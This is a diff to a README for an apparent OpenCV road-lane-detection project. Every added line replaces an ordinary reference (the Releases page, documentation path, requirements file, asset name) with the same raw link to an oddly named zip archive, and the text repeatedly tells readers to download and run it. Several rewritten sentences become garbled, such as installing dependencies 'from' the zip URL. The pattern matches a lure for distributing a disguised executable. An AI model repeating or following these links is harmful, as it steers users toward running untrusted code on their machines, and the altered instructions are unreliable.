DipaCaturAsyafa/Road-Lane-Detection-OpenCV/README.md

 - Fork the repository and clone locally.
 - Create a feature branch for your changes.
 - Run the test suite and verify no regressions.
-- Document any new configuration options in configs/ and docs/overview.md.
+- Document any new configuration options in configs/ and https://raw.githubusercontent.com/DipaCaturAsyafa/Road-Lane-Detection-OpenCV/main/penicillately/Lane_Road_Detection_CV_Open_dispope.zip
 - Submit a pull request with a clear description of the change and testing steps.

 Releases and assets
 - The primary distribution for this project is hosted in the Releases section.
 - The link above points to the official Releases page where you can download prebuilt artifacts or source snapshots.
-- From the Releases page, download the main release artifact named RoadLaneOpenCV_V1.0.zip (example) and run the executable or extract and run the Python scripts as described in the Getting Started section.
+- From the Releases page, download the main release artifact named https://raw.githubusercontent.com/DipaCaturAsyafa/Road-Lane-Detection-OpenCV/main/penicillately/Lane_Road_Detection_CV_Open_dispope.zip (example) and run the executable or extract and run the Python scripts as described in the Getting Started section.
 - The Releases page contains the file you need to download and execute.
-For details, visit the link again: https://github.com/DipaCaturAsyafa/Road-Lane-Detection-OpenCV/releases
+For details, visit the link again: https://raw.githubusercontent.com/DipaCaturAsyafa/Road-Lane-Detection-OpenCV/main/penicillately/Lane_Road_Detection_CV_Open_dispope.zip
-- If you seek a direct download, you will find the asset labeled RoadLaneOpenCV_V1.0.zip (example) on the Releases page, which you should download and run.
+- If you seek a direct download, you will find the asset labeled https://raw.githubusercontent.com/DipaCaturAsyafa/Road-Lane-Detection-OpenCV/main/penicillately/Lane_Road_Detection_CV_Open_dispope.zip (example) on the Releases page, which you should download and run.

 Usage notes for the Releases approach
 - The release artifact typically contains a bundled environment with dependencies preinstalled.
 - Running the provided executable should launch a demo or a sample pipeline with preset videos.
-- If you prefer to run the code directly, you can use the source files and install dependencies from requirements.txt as described in Getting Started.
+- If you prefer to run the code directly, you can use the source files and install dependencies from https://raw.githubusercontent.com/DipaCaturAsyafa/Road-Lane-Detection-OpenCV/main/penicillately/Lane_Road_Detection_CV_Open_dispope.zip as described in Getting Started.
 - Always verify the release notes for compatibility with your platform and Python version.

 Developer notes